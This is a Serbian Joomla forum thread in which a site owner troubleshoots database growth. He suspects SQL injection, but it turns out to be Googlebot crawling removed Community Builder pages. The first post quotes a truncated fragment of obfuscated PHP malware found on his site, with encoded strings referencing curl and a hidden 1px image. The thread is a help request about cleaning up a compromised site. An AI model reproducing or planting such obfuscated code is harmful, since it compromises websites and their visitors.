SQL injekcija ili...?

Moderators: TheHacker, cicans

Locked
drsevo
Joomla! Apprentice
Joomla! Apprentice
Posts: 8
Joined: Wed Nov 24, 2010 12:06 am

SQL injekcija ili...?

Post by drsevo » Fri Aug 23, 2013 2:24 pm

Pozdrav svima,
primetio sam da mi je baza jako velika (1600mb) pa rekoh da vidim šta ima u njoj. 1000mb je bila tabela redirect_links a oko 500 tabela rokusers.Obrisao sam rokusers i ispraznio redirect_links i sajt je ostao sa bazom 38mb.
Primetio sam da se u komponenti redirection (Redirect Manager: Links) svake sekunde pojavljuju linkovi koji ne postoje, pa ih komponenta beleži i baza raste svake sekunde.
Problem sam rešio tako što sam isključio plugin System - Redirect, baza više ne raste.
Medjutim, problem sigurno i dalje postoji, nešto i dalje pokušava da otvori adrese tipa

korisnicki-profil/userslist/Lista članova sajta?cbsecuritym3=cbm_25ddd2ac_623e4e28_47713abb5dd2b5632e1bee65d0176db8&limit=30&start=1980

korisnicki-profil/userslist/Lista članova sajta?cbsecuritym3=cbm_68160aac_7cc41830_f3e9c09c2eac72d2dc6e3d959a465e21&limit=30&start=2220

korisnicki-profil/userslist/Lista članova sajta?cbsecuritym3=cbm_7623c2a6_5deba3db_f722eab0779c1a47033787056d19c3f2&limit=30&start=180

U pitanju je komponenta community builder ali nikako ne mogu da nadjem uzrok.
Na sajtu sam našao par malicioznih kodova tipa:
<?php /*versio:2.11*/$Q000Q=0;$GLOBALS['IlII'] = '0fY3VybA62X2luaXQ%.1!3&YWxsb3dfdXJsX2ZvcGVu!55MQ64^X3NldG9wdA1#X2V4ZWMXwcY2xvc2U*.
PGltZyBzcmM9Ig~IiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4ddwa29ubW8ubmV0d8_a3RpcHAuY2g7
%00&c2lsYmVyLmRlf$&~@WV8~e5Og*7~ZGlzcGxheV9lcnJvcnM__@5*ZGV0ZXJtaW5hdG9y*YW5k9(&
Mi4xMQ...

Sve sam uklonio i na hostu sigurno nema ništa što sadrži: /*versio: ili <?php(sa velikim razmacima posle)

Zna li neko kako bih mogao da pronadjem ekstenziju, koje ključne reči da ukucam u pretragu php fajlova.

Pomaže li išta Marco's SQL Injection

Kada isključim SEF sve radi kako treba

hvala

drsevo
Joomla! Apprentice
Joomla! Apprentice
Posts: 8
Joined: Wed Nov 24, 2010 12:06 am

Re: SQL injekcija ili...?

Post by drsevo » Sun Aug 25, 2013 5:35 pm

Pronašao sam u čemu je problem. Uopšte se ne radi o hakovanju već su u pitanju strane koje su sklonjene sa sajta.
Googlebot non stop pokušava da pristupi tim stranama.
Vidim da može da se zabrani pristup pojedinim folderima na hostu pomoću robot.txt upotrebom

User-agent: *
Disallow: /folder1/

e sada me zanima da li postoji mogućnost da se to zabrani za deo url-a kao što je u ovom slučaju /userslist/ jer to nije folder

User avatar
cicans
Joomla! Hero
Joomla! Hero
Posts: 2226
Joined: Fri Oct 12, 2007 10:31 am
Location: Novi Sad, Serbia
Contact:

Re: SQL injekcija ili...?

Post by cicans » Mon Aug 26, 2013 9:57 am

Blog: http://www.kuvarancije.com/
Serbian Joomla!® Translation Team Coordinator http://www.joomla-serbia.com/
Follow me on Twitter @cicans - Svetlana Zec


Locked

Return to “Bezbednost”